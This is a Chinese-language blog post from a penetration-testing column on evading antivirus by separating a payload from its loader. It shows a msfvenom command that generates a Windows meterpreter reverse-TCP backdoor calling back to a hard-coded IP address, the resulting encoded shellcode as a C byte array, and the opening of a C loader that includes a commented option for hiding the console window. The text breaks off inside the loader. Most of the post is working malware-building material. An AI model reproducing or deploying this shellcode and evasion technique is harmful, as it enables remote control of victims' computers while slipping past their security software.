Payload分离免杀绕过杀软

最新推荐文章于 2024-09-26 09:10:25 发布

火中的冰~

最新推荐文章于 2024-09-26 09:10:25 发布

阅读量3k

点赞数

分类专栏：渗透测试

本文链接：https://blog.csdn.net/qq_42094992/article/details/109084655

版权

Payload分离免杀绕过杀软

杀毒软件的原理是根据特征、行为、基于云查杀，云查杀主要是根据特征码进行查杀，每一种杀毒软件都会检测头文件，所以可以进行程序段代码分离的形式，绕过当前主流杀软。

1.C语言编译后门

root@iZ2ze0r5hel5o5dt2w9uluZ:~# msfvenom -a x86 --platform Windows \
> -p windows/meterpreter/reverse_tcp \
> -b '\x00\x0b' LHOST=123.56.138.161 LPORT=1234 -f c
Found 11 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 368 (iteration=0)
x86/shikata_ga_nai chosen with final size 368
Payload size: 368 bytes
Final size of c file: 1571 bytes
unsigned char buf[] = 
"\xda\xda\xd9\x74\x24\xf4\x5f\x31\xc9\xb1\x56\xba\xa9\x70\x10"
"\xb6\x83\xc7\x04\x31\x57\x14\x03\x57\xbd\x92\xe5\x4a\x55\xd0"
"\x06\xb3\xa5\xb5\x8f\x56\x94\xf5\xf4\x13\x86\xc5\x7f\x71\x2a"
"\xad\xd2\x62\xb9\xc3\xfa\x85\x0a\x69\xdd\xa8\x8b\xc2\x1d\xaa"
"\x0f\x19\x72\x0c\x2e\xd2\x87\x4d\x77\x0f\x65\x1f\x20\x5b\xd8"
"\xb0\x45\x11\xe1\x3b\x15\xb7\x61\xdf\xed\xb6\x40\x4e\x66\xe1"
"\x42\x70\xab\x99\xca\x6a\xa8\xa4\x85\x01\x1a\x52\x14\xc0\x53"
"\x9b\xbb\x2d\x5c\x6e\xc5\x6a\x5a\x91\xb0\x82\x99\x2c\xc3\x50"
"\xe0\xea\x46\x43\x42\x78\xf0\xaf\x73\xad\x67\x3b\x7f\x1a\xe3"
"\x63\x63\x9d\x20\x18\x9f\x16\xc7\xcf\x16\x6c\xec\xcb\x73\x36"
"\x8d\x4a\xd9\x99\xb2\x8d\x82\x46\x17\xc5\x2e\x92\x2a\x84\x26"
"\x57\x07\x37\xb6\xff\x10\x44\x84\xa0\x8a\xc2\xa4\x29\x15\x14"
"\xbd\x3e\xa6\xca\x05\x2e\x58\xeb\x75\x66\x9f\xbf\x25\x10\x36"
"\xc0\xae\xe0\xb7\x15\x5a\xeb\x2f\xed\xa2\x61\x0e\x79\xd0\x75"
"\x55\xa8\x5d\x93\x05\x1c\x0d\x0c\xe6\xcc\xed\xfc\x8e\x06\xe2"
"\x23\xae\x28\x29\x4c\x45\xc7\x87\x24\xf2\x7e\x82\xbf\x63\x7e"
"\x19\xba\xa4\xf4\xab\x3a\x6a\xfd\xde\x28\x9b\x9a\x20\xb1\x5c"
"\x0f\x20\xdb\x58\x99\x77\x73\x63\xfc\xbf\xdc\x9c\x2b\xbc\x1b"
"\x62\xaa\xf4\x50\x55\x38\xb8\x0e\x9a\xac\x38\xcf\xcc\xa6\x38"
"\xa7\xa8\x92\x6b\xd2\xb6\x0e\x18\x4f\x23\xb1\x48\x23\xe4\xd9"
"\x76\x1a\xc2\x45\x89\x49\x50\x81\x75\x0f\x7f\x2a\x1d\xef\x3f"
"\xca\xdd\x85\xbf\x9a\xb5\x52\xef\x15\x75\x9a\x3a\x7e\x1d\x11"
"\xab\xcc\xbc\x26\xe6\x91\x60\x26\x05\x0a\x93\x5d\x66\xad\x54"
"\xa2\x6e\xca\x55\xa2\x8e\xec\x6a\x74\xb7\x9a\xad\x44\x8c\x95"
"\x98\xe9\xa5\x3f\xe2\xbe\xb6\x15";

将上面的shellcode 复制下来运用内联汇编的形式编写生成.exe可执行文件。

#include <stdio.h>
#include <windows.h>

//#pragma comment(linker,"/subsystem:\"windows\" /entry:\"mainCRTStartup\"")  // 隐藏控制台窗口显示
#pragma comment(linker,"/INCREMENTAL:NO")